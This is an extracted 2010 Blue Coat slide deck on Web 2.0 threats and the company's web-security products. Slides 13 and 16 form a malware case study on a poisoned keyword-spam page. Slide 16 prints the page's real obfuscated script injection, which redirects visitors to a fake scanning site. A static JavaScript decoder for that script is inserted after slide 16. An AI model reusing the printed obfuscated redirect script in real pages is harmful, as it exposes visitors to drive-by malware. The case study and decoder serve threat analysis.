
1 Blue Coat and the Blue Coat logo are trademarks of Blue Coat Systems, Inc., and may be registered in certain jurisdictions. All other product or service names are the property of their respective owners. © Blue Coat Systems, Inc. 2010. All Rights Reserved. Living in a Web 2.0 World (and how BCSI can help!) Mark Stanford SE Manager 20110 Ashbrook Place, Suite 275 Ashburn, VA 20147 (703) 857-2100 www.geobridge.net

2 Agenda
- Definition of Web 2.0 Overview
- Real World Web 2.0 application and threat examples
- BCSI countermeasures: Layered Security Defenses

3 What is Web 2.0? (diagram labels: Applications & Services; Technologies & Programming Languages; Software & Systems)

4 Web Evolution (diagram labels: Interactive Pages; Community Model; Multi-Host Pages; Static Pages; Dynamic Pages; Publishing Model; Single Host Pages; Nice to Have; Must Have)

5 Cyber Crime Evolution (diagram labels, in extraction order: Invisible Data Collection/Identity Profit Driven Wide-spread, Fast Visible, DoS Damage/Defacement Ingenuity/Pride Driven Amateurs Professionals Targeted)

6 Web 2.0
Did NOT change…
- the OSI model
- the way IP addresses work
- the way URLs are handled
- the way Web Filtering works
DID change…
- how information gets posted, even legitimate sites
- how information may be presented
- By 2012 the Internet will be 75X larger than in 2002
- What is required to find/identify threats on the web

7 Web 2.0 Also Means 1 URL Leads to Many
- 12 Domains, 130 URLs (www.cnn.com, 31.03.2010, 10:12 a.m. German Time)
- 12 Domains, 246 URLs (www.bild.de, 31.03.2010, 10:17 a.m. German Time)

8 Web 2.0 and Search Engines (diagram labels: www; Search Engine View; Forums; Blogs; Wikis; Guestbooks)


10 Malware Case Study

11 WebPulse saw a new referrer… (diagram label: WebPulse)


13 Nothing here… Install Keys Satellite body { font-family: verdana; margin: 10px 100px; } Install Keys Satellite install clear xbox controller install remove lexus power window audio install honda civic 2007 ex install linux suse on new computer install electronic diary install cs3 in vista install warehouse shelving hp deskjet 5550 install software valve relief chevy piston install install patrol air filter no install lock folders how to install mailbox garage door have vb setup install jmail axle install hellwig ghetto install s forum apron front sink install tiger wood install install cobra fatty freeway bars plasma install adaptec tape install remote install software cnps 9500 install install modular plug rj45 can't install program how to install neon tubes how to install themes for mac 2003 install microsoft office msdos install system software install through active directory install vcr to dish network nero startsmart install error blat install syntax dell workstation 360n install cpu install setup install tunnel protectors project 2007 how to install self install fire pit install grub dual boot deluxe install prizm pro how to install a window shutter install laminate over existing counter top linksys 54g install

14 So… How did the User get there?


16 Interesting… Install Keys Satellite document.write(unescape('%3C%73%63%72%69%70%74%20%6C%61%6E%67%75%61%67%65%3D%22%6A%6 1%76%61%73%63%72%69%70%74%22%3E%0D%0A%66%75%6E%63%74%69%6F%6E%20%64%46%28%73%29 %7B%0D%0A%76%61%72%20%73%31%3D%75%6E%65%73%63%61%70%65%28%73%2E%73%75%62%73%74 %72%28%30%2C%73%2E%6C%65%6E%67%74%68%2D%31%29%29%3B%20%76%61%72%20%74%3D%27%27 %3B%0D%0A%66%6F%72%28%69%3D%30%3B%69%3C%73%31%2E%6C%65%6E%67%74%68%3B%69%2B%2 B%29%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%3 1%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%2D%73%2E%73%75%62%73%74%72%28%73%2E %6C%65%6E%67%74%68%2D%31%2C%31%29%29%3B%0D%0A%64%6F%63%75%6D%65%6E%74%2E%77%7 2%69%74%65%28%75%6E%65%73%63%61%70%65%28%74%29%29%3B%0D%0A%7D%0D%0A%3C%2F%73%6 3%72%69%70%74%3E'));dF('%264Dtdsjqu%264Fepdvnfou/mpdbujpo%264E%2633iuuq%264B00tubcjmjuzjofutdbo/dp n0ijujo/qiq%264Gmboe%264E31%2637bggje%264E27%3A11%2633%264C%264D0tdsjqu%264F1'); body { font-family: verdana; margin: 10px 100px; } Install Keys Satellite install clear xbox controller install remove lexus power window audio install honda civic 2007 ex install linux suse on new computer install electronic diary install cs3 in vista install warehouse shelving hp deskjet 5550 install software valve relief chevy piston install install patrol air filter no install lock folders how to install mailbox garage door
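A static decoder for the two-stage script on slide 16, added here as an example (it is not part of the original deck or of any Blue Coat tooling). Percent-decoding the slide's first `unescape(...)` string yields the `dF(s)` routine that `decodeDF` mirrors; the sample input is constructed and points at the reserved `example.invalid` name, and `pctDecode`, `decodeDF`, `findDFArgs`, `extractUrls` and `triage` are names chosen for this example.

```javascript
'use strict';

// Percent-decode %XX as data; nothing is evaluated or written to a DOM.
function pctDecode(s) {
  return s.replace(/%([0-9A-Fa-f]{2})/g,
    (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

// Static equivalent of dF(s): last character = numeric key; the rest is
// percent-decoded, each char code lowered by the key, then decoded again.
// Whitespace is dropped first: the encoded form contains none, but
// transcribed copies often carry line-wrap spaces.
function decodeDF(arg) {
  const s = arg.replace(/\s+/g, '');
  const key = Number.parseInt(s.slice(-1), 10);
  if (Number.isNaN(key)) throw new Error('last character is not a numeric key');
  const s1 = pctDecode(s.slice(0, -1));
  let t = '';
  for (let i = 0; i < s1.length; i++) {
    t += String.fromCharCode(s1.charCodeAt(i) - key);
  }
  return pctDecode(t);
}

// Quoted argument of every dF('...') call found in raw page source.
function findDFArgs(source) {
  return Array.from(source.matchAll(/\bdF\(\s*(['"])([^'"]*)\1\s*\)/g), m => m[2]);
}

// URLs in the decoded text, for logging or filter-list review.
function extractUrls(text) {
  return text.match(/https?:\/\/[^\s"'<>]+/g) || [];
}

// Decode every dF() call in a page without rendering it.
function triage(source) {
  return findDFArgs(source).map((arg) => {
    const decoded = decodeDF(arg);
    return { decoded, urls: extractUrls(decoded) };
  });
}

// Constructed sample (not the slide's payload); target is a reserved name.
const SAMPLE_SOURCE = "<title>keyword page</title><script>dF('" +
  '%264Dtdsjqu%264Fepdvnfou/mpdbujpo%264E%2633iuuq%264B00fybnqmf/' +
  'jowbmje0mboejoh%2633%264C%264D0tdsjqu%264F1' + "');</script>";

console.log(triage(SAMPLE_SOURCE));
```

Because the decoder only transforms strings, it can be run over cached page source from a proxy log without a browser or sandbox.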

17 A friendly piece of advice…

18 You are in trouble…

19 This is very serious


22 Web 2.0 Examples - Twitter: Still a toy or already a tool?

23 Web 2.0 Examples - Mashups

24 Web 2.0 Examples - Facebook: Still a toy or already a tool?

25 Koobface worm (January 2009)
- Invitation to click on a link in Facebook or Myspace in-box
- Supposedly link to a funny video
- Users were told that they have to update their Flash player to view the video
- The installed SW was a proxy server
- Now selected traffic could be redirected to the attacker
- A second program to download and install arbitrary code was installed, too
- Like magic, the infected computer is now a zombie, under the control of unknown villains

26 Changing Web Habits
Top 10 Categories – 2009 WebFilter/WebPulse, 62M+ Users
1. Social Networking
2. Web Advertisements
3. Search Engines/Portals
4. Personals/Dating
5. Pornography
6. Computers/Internet
7. Audio/Video Clips
8. Adult/Mature Content
9. Web Email
10. Illegal/Questionable
Social Networking
- Moved to #1 from #2 position
- Represents 25% of Top10 requests
Web Email
- Dropped to #9 from #5 position
- Users migrating to social networking
Cyber Crime Leverages
- Search engine poisoning
- Fake AV and Codec updates
- Popular site injections
- Death, Drama & Disaster lures
- Health & Wealth scams

27 Layered Security Defenses

28 Blue Coat Layered Defenses
- Cloud Service: WebPulse & WebFilter
- Inline Threat Detection: ProxyAV
- Web Application & Content Controls: ProxySG
- Integrated Data Loss Prevention: ProxySG with 6 DLP partners
- Remote Users: ProxyClient

29 Hybrid Design Architected to Deliver On-Demand Security Intelligence
- Industry's leading collaborative cloud defense with 62M users
- Real-time inputs of any new web content and dynamic links
- Web protection, visibility, and reporting in any location
Web Gateway Protection
- Inline threat analysis w/SSL
- Web filtering & content controls
- Media optimization + B/W Mgmt
Cloud Defenses
- Real-time web content ratings
- Web threat & malware detection
- Reputation ratings
(diagram labels: WAN; ProxySG & ProxyAV; WebFilter; WebPulse; ProxyClient; Remote Users; URL Filtering & Reporting; Cloud threat protection; Reporter; Web)

30 Blue Coat Secure Web Gateway (diagram labels: Malware Scanning; Protocol Compliance; Content Filters; Data Types; Active Content; URL Filtering; AAA Policy; Certificate Validation; Method Controls; BCWF; WebPulse; Reporter; Log Files; Object Cache; Bandwidth Management; Protocol Optimization)
ProxyAV:
- Behavior based analysis
- Signatures

31 Preserve Productivity BCWF Malware Identification Strategy
Dynamic Link Analysis
A. Popular Web Site Pointers
B. Middle Relay Servers & Link Farms
C. Malware Download Hosts

32 Dynamic Link Analysis
- Cloud connected community that is broad and diverse
- Real-time input of new web links to the cloud service
- Immediate analysis of URL chain for threats & rating
- Update master database in cloud to protect all members
(diagram label: Cloud Community)

33 Dynamic Link Analysis
- Cloud connected community that is broad and diverse
- Real-time input of new web links to the cloud service
- Immediate analysis of URL for threats & rating
- Update master database in cloud to protect all members
(diagram label: Cloud Community)


36 Dynamic Link Analysis
- Cloud connected community that is broad and diverse
- Real-time input of new web links to the cloud service
- Immediate analysis of full link chain for threats & rating
- Update master database in cloud to protect all members
(diagram labels: Protects; Web Gateways; Remote Users; Cloud Community)

37 WebPulse: First Complete DLA solution
- New defense layer
- Full Dynamic link analysis
- Foundation for next generation URL filtering
- Fast, Aware, Protective… for anyone, anywhere
(diagram labels: Protects; Web Gateways; Remote Users; Cloud Community; WebPulse 62M Users; WebFilter 2B reqs/week; ProxySG; ProxyClient; K9)

38 (architecture diagram; labels in extraction order) K-9 Web Protect ProxyClient ProxySG ProxyAV BCWF Full List 16 Sources Signatures Behavior Heuristics Reputation Sandboxing Threat Analysis Deep Background Rating Analysis (DBRA) 2 Secs – 2hrs RTT Balanced URL Malware Uncategorized sent to WebPulse for Dynamic categorization 62M+ User Community 45B+ requests/week Fully Configurable and Secure 5 Min for security updates Rating Servers 300M Unique requests daily 1.2B requests rated weekly 50 languages Fast (ms) – try it! Real Time Boundary WebPulse Clients WebPulse Cloud Service Dynamic URL Cache Dynamic URL Cache Dynamic URL Cache URL & Content Trainers ANZ Master Rating Database VA CA HK UK

39 ProxyAV: Co-Processor Architecture
- Improved utilization with M:N ratio
- Higher throughput per gateway
- Results in less hardware (with new AV HW: always 1 SG – 1 AV sizing possible)
- Optimized design
(diagram labels: Enterprise Network; Internet; ProxySG; ProxyAV; Clean Object Cache; Finger Print Cache; Dual Cache Design; Patience Page; Trickle First; Trickle Last; Defer Scan (media); ICAP, ICAP+, S-ICAP)

40 ProxyAV – anti-malware features
- Don't get confused by the name AV
- Anti-malware features are more comprehensive than traditional pattern matching technologies
  - Behavioral analysis
  - Sandboxing
  - Heuristics
  - True file type detection
  - Etc.
- ProxyAV vs. competitors: Aurora exploit (CVE-2010-0249)
- Note: Finjan was not able to block the exploit without a security update
- It is a different approach and philosophy

41 ProxyClient included with WebFilter: Remote Filtering Cloud Connected Threat Protection Acceleration Central Policy Reporting

42 Why Blue Coat Products?
- Unmatched policy controls & authentication options
- Proactive Malware/MMC detection
- Real-time web content analysis/DLA for gateway & client
- URL database, threat detection, and DLP partners
- Custom object-based OS with patented cache technologies
- Broad proxy library & acceleration techniques
- Bandwidth management & protocol optimization/compliance
- Experience, Reliability, Performance
All the RIGHT parts!

43 Questions?
